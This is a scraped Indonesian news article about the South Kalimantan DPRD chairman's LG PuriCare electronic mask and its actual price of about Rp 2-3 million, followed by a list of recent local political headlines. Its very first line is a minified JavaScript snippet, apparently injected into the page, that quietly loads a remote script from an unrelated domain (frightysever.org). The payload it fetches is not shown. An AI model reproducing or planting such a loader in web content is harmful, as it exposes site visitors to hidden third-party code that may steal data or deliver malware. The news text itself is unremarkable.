(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Mengaku Pakai Masker Seharga Motor, Berapa Sebenarnya Harga Masker ‘Canggih’ Ketua DPRD Kalsel?


KANALKALIMANTAN.COM, BANJARMASIN- Ada yang menarik dengan penampilan Ketua DPRD Kalsel Supian HK. Tak seperti biasanya, orang nomor satu di dewan ini tampil dengan masker elektronik yang terlihat canggih dengan lampu menyala.

Penampilan beda Supian HK ini pun sempat mengundang tanya wartawan di DPRD Kalsel terkait masker yang dikenakan.

“Ini bisa aku saja masih yang pakai di Kalsel,” kata Supian HK, kepada wartawan seperti dilansir tribunbanjarmasin.com, Selasa (6/7/2021).

Wartawan yang menanya harga masker tersebut, dijawab Supian harganya bisa membeli satu buah sepeda motor.
“Kawa (bisa) aja nukar (beli) sebuah sepeda motor,” tambahnya.

 

 

Baca juga: Terus Cetak Rekor, Kapan Puncak Kurva Kasus Covid-19 di Indonesia? Begini Kata Pakar

Lalu berapa sebenarnya harga masker tersebut? Kanalkalimantan.com yang mencoba menelusuri model masker yang sama di toko online, ternyata harganya berkisar antara Rp 2-3 juta.

Masker dengan nama LG PuriCare di shoppe dijual dengan harga Rp 2.195.000. Sedangkan di onliheshop yang lain ada yang menjual barang sama dengan harga 2.779.000 dan ada pula yang menjual Rp 3.300.000.

Masker LG PuriCare Wearable Air Purifier Foto : ist

Masker LG PuriCare Wearable Air Purifier Foto : ist

Setelah diluncurkan secara global, LG PuriCare Wearable Air Purifier akhirnya juga bisa dibeli di Indonesia. Dari brosur produk, penggunaan saringan khusus tersebut membuat LG PuriCare Wearable Air Purifier memiliki tingkat efektivitas optimal dalam menghilangkan bakteri, virus serta berbagai allergen yang melayang di udara.

Agar tidak sekadar klaim, LG mengujikan perangkatnya di bawah observasi lembaga uji internasional TÜV Rheinland di Korea Selatan pada bulan Mei 2020.

“Reputasi LG dalam industri perangkat pembersihan udara dengan berbagai inovasi sepanjang perjalanannya, memungkinkan rancangan kinerja penyaringan yang lebih optimal bagi pembersihan udara,” ujar Jay Jang, Head of Marketing LG Electronics Indonesia.

Baca juga: Kejari HSU Tangkap WL, Buron Kejari Tala terkait Kasus Korupsi APBDes Desa Batu Ampar!

LG mengatakan pengembangan air purifier wearable ini berdasarkan analisis pada tekstur wajah berpadu dengan pelindung bagian dalam dari material silikon medical grade, memberikan kenyamanan saat menempel di wajah.

Desain ini sekaligus dibuat dengan pertimbangan untuk meminimalisir tingkat kebocoran udara hingga di bawah 10% pada sepanjang penggunaannya.

Meski dengan rancang bentuk yang rapat, tak membuat proses pernapasan pengguna menjadi terhambat. Teknologi yang diterapkan LG bahkan membuat pengguna dapat melakukan pernapasan alami.

Hal ini berkat keberadaan Dual Fan dan Respiratory Sensor. Berbentuk kipas yang menempel pada tempat filternya, Dual Fan memastikan penyaringan udara lebih baik dengan opsi pengaturan tiga tingkat kecepatan, sementara sesuai namanya, Respiratory Sensor bekerja mengidentifikasi tingkat volume pernapasan pengguna.

“Kerja kedua teknologi yang telah dipatenkan inilah yang membuat pernapasan berlangsung alami, seolah tak menggunakan perangkat. Membuatnya mampu menyesuaikan kenyamanan pernapasan dalam aktivitas biasa maupun saat beraktivitas berat seperti saat tengah berlari,” ujar Jay Jang.

Menunjang kinerjanya, perangkat ini ditenagai baterai built-in berkekuatan 820mAh yang dapat diisi ulang. Kekuatan baterai ini membuatnya mampu beroperasi hingga delapan jam dengan kecepatan rendah dan dua jam pada pengaturan tertinggi.

Baca juga: Sempat Viral, Pelaku Penganiayaan di Pasar Antasari Banjarmasin Diringkus

Dengan komponen utama seperti filter, penutup dalam, pelindung wajah, tali telinga dan pemanjang tali mudah dilepas dan ganti, membuat perangkat purifier wearable ini mudah dibersihkan.

Di Indonesia, LG PuriCare Wearable Air Purifier dibanderol Rp 2,399 juta dan ditawarkan dalam paket penjualan yang termasuk berbagai perangkat cadangan pengganti. Selain unit utama, di dalamnya juga akan termasuk 4 filter PuriCare, 10 lapisan dalam, 1 tali tambahan untuk telinga, dan 1 kabel pengisi daya tipe C. Khusus untuk membawanya sehari-hari, untuk menjaga tingkat kebersihannya LG juga menyediakan 1 kantong khusus.

Sementara sebagai opsi tambahan yang melengkapi penjagaan kebersihan bagi PuriCare Wearable Air Purifier, LG menyediakan wadah penyimpan berteknologi sanitasi LG UV Nano.

Hadir dengan opsi pembelian terpisah, wadah khusus ini menggunakan pancaran cahaya UV-C LED yang dirancang mampu mengeliminasi 99.99% kuman hanya dalam 30 menit. Tak hanya itu, wadah khusus ini menyingkirkan kelembaban pada berbagai komponen dalam yang disebabkan pernapasan penggunanya. (Kanalkalimantan.com/dewi)

Reporter: dewi
Editor: cell


Risa

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

2 jam ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

2 jam ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

3 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

6 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

7 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

18 jam ago

This website uses cookies.